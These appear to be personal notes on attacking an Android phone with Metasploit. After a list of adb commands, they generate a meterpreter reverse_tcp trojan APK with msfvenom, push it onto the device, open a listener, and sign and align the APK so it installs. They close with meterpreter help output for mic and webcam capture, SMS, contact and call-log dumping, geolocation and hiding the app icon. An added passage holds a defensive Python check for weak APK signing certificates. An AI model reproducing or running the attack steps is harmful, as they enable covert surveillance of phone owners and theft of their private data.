msf+android
0. adb commands
List connected devices:
adb devices
- If more than one device is connected:
adb -s <device serial> <other command>
Example:
adb -s device1 install xxx.apk
Show the top (focused) Activity:
- On Windows:
adb shell dumpsys activity | findstr "mFocusedActivity"
- On Linux and macOS:
adb shell dumpsys activity | grep "mFocusedActivity"
View logs:
adb logcat
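Install an APK file:
adb install xxx.apk
- Installed this way, the install fails if the app already exists;
a reinstall that replaces the existing app is recommended:
adb install -r xxx.apk
- For example, a package built directly with Run is test-only and cannot be installed this way; use -t:
adb install -r -t xxx.apk
Uninstall an app:
adb uninstall com.zhy.app
- To keep the app's data:
adb uninstall -k com.zhy.app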
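Transfer files:
- Push a file to the phone's SD card:
adb push <file name> <SD card path on the phone>
Example:
adb push 帅照.jpg /sdcard/
- Pull a file from the phone:
adb pull /sdcard/xxx.txt
List the package names of all apps installed on the phone:
adb shell pm list packages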
Start an Activity:
adb shell am start <package name>/<full Activity path>
Example:
adb shell am start com.zhy.aaa/com.zhy.aaa.MainActivity
- To pass a parameter (an Intent extra with key "name"):
adb shell am start com.zhy.aaa/com.zhy.aaa.MainActivity -e name zhy
- Start an implicit Intent:
adb shell am start -a "android.intent.action.VIEW" -d "https://www.google.com"
Send a broadcast:
adb shell am broadcast -a "broadcastactionfilter"
- To pass a parameter (an Intent extra with key "name"):
adb shell am broadcast -a "broadcastactionfilter" -e name zhy
Start a service:
adb shell am startservice "com.zhy.aaa/com.zhy.aaa.MyService"
Take a screenshot:
- The screencap command captures the phone screen, for example:
adb shell screencap /sdcard/screen.png
Record video:
- The screenrecord [options] filename command records the screen, for example:
adb shell screenrecord /sdcard/demo.mp4
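1. Environment
- Kali Linux20 192.168.31.199
- Huawei nova3 192.168.31.90
Installing adb
apt-get install android-tools-fastboot
apt-get install android-tools-adb
adb connect connection problems
Enable USB debugging in developer options and connect the phone to the computer with a data cable.
Huawei phones: enter *#*#2846579#*#* in the dialer to open the engineering menu, go to background settings, tap USB port settings and switch to manufacture mode.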
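2. Generating the trojan
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.68 LPORT=5555 R > apk.apk
3. Installation
adb root
adb remount
adb push <apk path> system/app
However, the Huawei phone cannot be rooted, so the install has to be done manually.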
4. Connection
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.68
set LPORT 5555
exploit
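5. Digital signature
1. Generate the APK trojan with msfvenom
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > lhw.apk
-p  attack payload
LHOST = host that receives the reverse connection
LPORT = listening port on the host that receives the reverse connection
followed by the output path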
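2. keytool (key and certificate management tool)
First create a certificate with keytool:
keytool -genkey -v -keystore apk-trojan-key.keystore -alias tempt -keyalg RSA -keysize 1024 -validity 999
-v  show detailed certificate information from the keystore
-keystore  name of the keystore
-alias  alias to create (note: it must match the alias used when signing the APK in the next step, because this is the digital certificate for lhw.apk)
-keyalg  key algorithm (default DSA)
-keysize  key length
-validity  number of days the created certificate is valid (default 90)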
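3. Jarsigner (JAR signing and verification tool)
Then sign with jarsigner:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore lhw.apk tempt
-verbose  print detailed output when signing/verifying
-sigalg  name of the signature algorithm
-digestalg  name of the digest algorithm
-keystore  keystore location
followed by the file to sign and the alias (this does not generate an alias file)
Use -verify to verify the file's signature (verification can be skipped on the local machine; the phone will certainly verify the signature at install time)
jarsigner -verify -verbose lhw.apk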
4. Zipalign (APK optimization tool), must be installed
Optimize the APK with Zipalign; if this step is skipped, some phones will fail to install it:
zipalign -v 4 lhw.apk jxb.apk
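A defender-side check for the signing parameters used in this section (1024-bit RSA key, SHA1-based signature, certificate created with default answers), as an added example that is not part of the original notes: it parses certificate text in the layout printed by `keytool -printcert -jarfile` and reports weak settings. The sample text, the function names and the 2048-bit threshold are assumptions made for this example.

```python
import re

# Constructed sample in the layout `keytool -printcert -jarfile app.apk`
# prints (assumed layout; all values are made up for this example).
SAMPLE = """\
Signer #1:

Certificate #1:
Owner: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
Issuer: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
Serial number: 1a2b3c4d
Valid from: Mon Aug 03 10:00:00 CST 2020 until: Sat Apr 29 10:00:00 CST 2023
Signature algorithm name: SHA1withRSA
Subject Public Key Algorithm: 1024-bit RSA key
Version: 3
"""


def parse_cert(text):
    """Collect 'Key: value' lines from the printout into a dict (keys lowercased)."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return fields


def audit(text, min_rsa_bits=2048):
    """Return a list of findings for one signer certificate printout."""
    f = parse_cert(text)
    findings = []
    sig = f.get("signature algorithm name", "")
    if re.match(r"(SHA1|MD5|MD2)with", sig, re.I):
        findings.append(f"weak signature digest: {sig}")
    m = re.match(r"(\d+)-bit (\w+) key", f.get("subject public key algorithm", ""))
    if m and m.group(2) == "RSA" and int(m.group(1)) < min_rsa_bits:
        findings.append(f"short RSA key: {m.group(1)} bits")
    # keytool fills every DN field with "Unknown" when the prompts are left
    # empty; treated here as a heuristic sign of a throwaway signing identity.
    dn = [p.split("=", 1)[1] for p in f.get("owner", "").split(", ") if "=" in p]
    if dn and all(v == "Unknown" for v in dn):
        findings.append("placeholder subject DN")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```
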
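Commands
- Microphone
- record_mic  record audio from the microphone for X seconds
-h  help
-d  number of seconds to record
-f  path to save the audio, default HOME/xxxx.wav
-p  automatically play the captured audio
- webcam_list  list the number of cameras on the phone
- webcam_snap  take a photo with the specified camera
-h  help
-i  select the camera to use
-p  image path, default HOME/xxxx.jpeg
-q  image quality, default 50
-v  automatically view the image
- webcam_chat  start a video chat
- webcam_stream  stream video from the camera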
https://www.cnblogs.com/hugboy/p/13419956.html
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
localtime Displays the target system local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Android Commands
================
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN information
Application Controller Commands
===============================
Command Description
------- -----------
app_install Request to install apk file
app_list List installed apps in the device
app_run Start Main Activty for package name
app_uninstall Request to uninstall application